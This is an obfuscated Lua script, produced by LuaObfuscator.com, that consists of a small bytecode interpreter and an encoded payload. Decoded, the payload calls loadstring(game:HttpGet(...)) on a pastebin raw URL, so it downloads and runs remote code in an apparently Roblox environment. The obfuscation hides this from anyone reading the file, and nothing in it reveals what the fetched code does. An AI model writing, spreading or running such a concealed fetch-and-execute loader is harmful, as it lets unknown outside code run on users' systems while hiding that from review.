--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v78=v2(v0(v30,16));if v19 then local v86=v5(v78,v19);v19=nil;return v86;else return v78;end end end);local function v20(v31,v32,v33) if v33 then local v79=0;local v80;while true do if (v79==(0 -0)) then v80=(v31/((5 -3)^(v32-(1 -0))))%(((881 -(282 + 595)) -2)^(((v33-((2257 -(1523 + 114)) -(555 + 64))) -(v32-1)) + (932 -(857 + 74)))) ;return v80-(v80%((512 + 57) -(367 + 201))) ;end end else local v81=(929 -(214 + 713))^(v32-(1 + (0 -0))) ;return (((v31%(v81 + v81))>=v81) and 1) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (1067 -(68 + 997)) );v18=v18 + (1272 -(226 + 1044)) ;return (v36 * 256) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (12 -9) );v18=v18 + (121 -(32 + 85)) ;return (v40 * (16441815 + 335401)) + (v39 * (14533 + (121669 -70666))) + (v38 * (1213 -(892 + 65))) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=1 -0 ;local v44=(v20(v42,1,36 -16 ) * ((352 -(16 + 71 + 263))^(212 -(67 + (200 -87))))) + v41 ;local v45=v20(v42,16 + 5 ,75 -(44 + 0) );local v46=((v20(v42,24 + 8 )==(3 -2)) and  -1) or (953 -(802 + 150)) ;if (v45==(0 -0)) then if (v44==(791 -(368 + 423))) then return v46 * (0 -0) ;else local v87=0 + 0 ;while true do if (v87==(997 -((2875 -1960) + 82))) then v45=2 -1 ;v43=0 + 0 ;break;end end end elseif (v45==2047) then return ((v44==((18 -(10 + 8)) -0)) and (v46 * ((1188 -(1069 + 118))/0))) or (v46 * NaN) ;end return v8(v46,v45-1023 ) * (v43 + (v44/((4 -2)^(113 -61)))) ;end local function v25(v47) local v48=0;local v49;local v50;while true do if (v48==(0 -0)) then v49=nil;if  not v47 then v47=v23();if (v47==(442 -(416 + 26))) then return "";end end v48=1;end if (1==v48) then v49=v3(v16,v18,(v18 + v47) -(3 -2) );v18=v18 + v47 ;v48=1 + (1487 -(998 + 488)) ;end if (v48==(3 -1)) then v50={};for v88=439 -(145 + 94 + 199) , #v49 do v50[v88]=v2(v1(v3(v49,v88,v88)));end v48=433 -(37 + 7 + 386) ;end if (3==v48) then return v6(v50);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=258 -(190 + 68) ;local v52;local v53;local v54;local v55;local v56;local v57;while true do if (v51==(0 -0)) then v52={};v53={};v54={};v55={v52,v53,nil,v54};v51=439 -(262 + 176) ;end if (v51==1) then v56=v23();v57={};for v90=1,v56 do local v91=0;local v92;local v93;local v94;while true do if (v91~=(1721 -(345 + 1376))) then else local v105=688 -(198 + 490) ;while true do if (v105==1) then v91=1;break;end if (v105==(0 -0)) then v92=0;v93=nil;v105=1;end end end if ((2 -1)~=v91) then else v94=nil;while true do if (v92~=0) then else local v108=1206 -(696 + 510) ;while true do if (v108==1) then v92=1;break;end if (v108==0) then local v146=0;while true do if (v146~=0) then else v93=v21();v94=nil;v146=1 -0 ;end if (1==v146) then v108=1;break;end end end end end if (v92==1) then if (v93==1) then v94=v21()~=(1262 -(1091 + 171)) ;elseif (v93==2) then v94=v24();elseif (v93~=3) then else v94=v25();end v57[v90]=v94;break;end end break;end end end v55[1 + 2 ]=v21();v51=6 -4 ;end if (2~=v51) then else for v95=1,v23() do local v96=0 -0 ;local v97;local v98;while true do if (v96~=(374 -(123 + 251))) then else v97=0;v98=nil;v96=1;end if (v96==1) then while true do if (v97~=0) then else v98=v21();if (v20(v98,1,4 -3 )~=(698 -(208 + 490))) then else local v142=0 + 0 ;local v143;local v144;local v145;while true do if (v142==(1 + 1)) then if (v20(v144,837 -(660 + 176) ,1)==(1 + 0)) then v145[204 -(14 + 188) ]=v57[v145[2]];end if (v20(v144,677 -(534 + 141) ,2)==1) then v145[3]=v57[v145[3]];end v142=3;end if (v142~=(0 + 0)) then else local v150=0 + 0 ;while true do if (v150==(0 + 0)) then v143=v20(v98,3 -1 ,3);v144=v20(v98,4,9 -3 );v150=2 -1 ;end if (v150~=1) then else v142=1;break;end end end if (v142~=(2 + 1)) then else if (v20(v144,2 + 1 ,3)==1) then v145[400 -(115 + 281) ]=v57[v145[9 -5 ]];end v52[v95]=v145;break;end if (v142==(1 + 0)) then local v152=0 -0 ;local v153;while true do if ((0 -0)==v152) then v153=867 -(550 + 317) ;while true do if (v153~=(1 -0)) then else v142=2 -0 ;break;end if (v153~=0) then else v145={v22(),v22(),nil,nil};if (v143==0) then local v162=0;local v163;while true do if (v162~=(285 -(134 + 151))) then else v163=1665 -(970 + 695) ;while true do if (v163~=(0 -0)) then else v145[3]=v22();v145[1994 -(582 + 1408) ]=v22();break;end end break;end end elseif (v143==(3 -2)) then v145[3 -0 ]=v23();elseif (v143==2) then v145[3]=v23() -(2^(60 -44)) ;elseif (v143~=(1827 -(1195 + 629))) then else local v168=0 -0 ;local v169;while true do if (v168==0) then v169=241 -(187 + 54) ;while true do if (v169==(780 -(162 + 618))) then v145[3]=v23() -((2 + 0)^(11 + 5)) ;v145[8 -4 ]=v22();break;end end break;end end end v153=1;end end break;end end end end end break;end end break;end end end for v99=1 -0 ,v23() do v53[v99-(1 + 0) ]=v28();end return v55;end end end local function v29(v58,v59,v60) local v61=v58[1];local v62=v58[2];local v63=v58[3];return function(...) local v64=v61;local v65=v62;local v66=v63;local v67=v27;local v68=1;local v69= -1;local v70={};local v71={...};local v72=v12("#",...) -1 ;local v73={};local v74={};for v82=0,v72 do if (v82>=v66) then v70[v82-v66 ]=v71[v82 + 1 ];else v74[v82]=v71[v82 + 1 ];end end local v75=(v72-v66) + 1 ;local v76;local v77;while true do v76=v64[v68];v77=v76[1];if (v77<=6) then if (v77<=2) then if (v77<=0) then do return;end elseif (v77==1) then v74[v76[2]]=v60[v76[3]];else v74[v76[2]]();end elseif (v77<=4) then if (v77>3) then v74[v76[2]]=v76[3];else local v114=0;local v115;local v116;local v117;local v118;while true do if (v114==0) then v115=v76[2];v116,v117=v67(v74[v115](v13(v74,v115 + 1 ,v76[3])));v114=1;end if (v114==2) then for v148=v115,v69 do local v149=0;while true do if (v149==0) then v118=v118 + 1 ;v74[v148]=v116[v118];break;end end end break;end if (v114==1) then v69=(v117 + v115) -1 ;v118=0;v114=2;end end end elseif (v77==5) then v74[v76[2]]=v60[v76[3]];else v74[v76[2]]=v76[3];end elseif (v77<=9) then if (v77<=7) then local v106=v76[2];v74[v106]=v74[v106](v13(v74,v106 + 1 ,v69));elseif (v77>8) then v74[v76[2]]();else do return;end end elseif (v77<=11) then if (v77>10) then local v123=v76[2];local v124,v125=v67(v74[v123](v13(v74,v123 + 1 ,v76[3])));v69=(v125 + v123) -1 ;local v126=0;for v139=v123,v69 do v126=v126 + 1 ;v74[v139]=v124[v126];end else local v127=v76[2];v74[v127]=v74[v127](v13(v74,v127 + 1 ,v69));end elseif (v77==12) then local v129=v76[2];local v130=v74[v76[3]];v74[v129 + 1 ]=v130;v74[v129]=v130[v76[4]];else local v134=v76[2];local v135=v74[v76[3]];v74[v134 + 1 ]=v135;v74[v134]=v135[v76[4]];end v68=v68 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F706173746562696E2E636F6D2F7261772F50415652794D487900083O0012053O00013O001205000100023O00200D000100010003001206000300044O000B000100034O000A5O00022O00023O000100016O00017O00",v9(),...);
